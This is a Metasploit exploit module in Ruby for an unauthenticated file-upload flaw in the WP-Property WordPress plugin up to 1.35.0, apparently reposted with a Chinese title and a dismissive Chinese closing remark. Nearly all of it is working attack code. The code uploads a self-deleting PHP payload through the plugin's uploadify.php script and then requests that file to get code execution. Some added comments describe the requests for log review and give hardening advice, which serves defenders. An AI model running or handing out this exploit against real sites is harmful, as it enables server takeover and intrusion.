WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

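# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description) reached through the
# plugin's bundled third-party/uploadify/uploadify.php script.
#
# Requests the module sends, for log review and detection engineering:
# * check   - one GET to .../wp-property/third-party/uploadify/uploadify.php
# * exploit - one multipart/form-data POST to that script with a "Filedata"
#             part whose filename is five random letters plus ".php" and a
#             "folder" part naming the uploadify directory, followed by one
#             GET of whatever path the script returned in its response body.
#
# Hardening notes: the description places the flaw in releases up to 1.35.0,
# so later releases are outside the stated range; independent of version,
# removing or denying access to the bundled uploadify.php and refusing to
# execute PHP from upload/temp directories closes this path.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The pasted listing had this mixin name mangled to "Msf::Exploit:hpEXE";
  # it is the mixin loaded by require 'msf/core/exploit/php_exe' and the
  # provider of get_write_exec_payload used in #exploit.
  include Msf::Exploit::PhpEXE

  # Registers module metadata, the two targets and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Reports whether the uploadify script answers at the expected location.
  #
  # This is a reachability test only: an HTTP 200 yields Appears, and no
  # version comparison or upload attempt is made, so a patched or neutered
  # script that still returns 200 is reported the same way.
  #
  # @return [Exploit::CheckCode::Unknown] no response, or a non-200 status
  # @return [Exploit::CheckCode::Appears] the script returned HTTP 200
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uploadify_dir}uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP file through uploadify.php and then requests it.
  #
  # The upload is accepted only when the reply is HTTP 200 and its body
  # contains the generated file name; anything else aborts via fail_with.
  # Because the payload is built with :unlink_self => true, the uploaded file
  # is asked to delete itself after it runs, so web-server access logs are a
  # more dependable trace than the file's presence on disk.
  def exploit
    plugin_dir = uploadify_dir
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part(plugin_dir, nil, nil, "form-data; name=\"folder\"")
    # Drops a CRLF that sits directly in front of a "--_Part_" boundary marker
    # at the start of a line (presumably the blank line Rex::MIME emits ahead
    # of the first boundary; confirm against Rex::MIME::Message#to_s).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{plugin_dir}uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The script's response body is used as-is as the path of the follow-up GET.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end

  private

  # Builds the URI path of the plugin's uploadify directory under TARGETURI,
  # appending a trailing slash to the base path when it lacks one.
  #
  # @return [String] path ending in "third-party/uploadify/"
  def uploadify_dir
    base = target_uri.path
    base << '/' if base[-1,1] != '/'
    "#{base}wp-content/plugins/wp-property/third-party/uploadify/"
  end
end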

不要问我这写的是什么 怎么利用 我是说msf.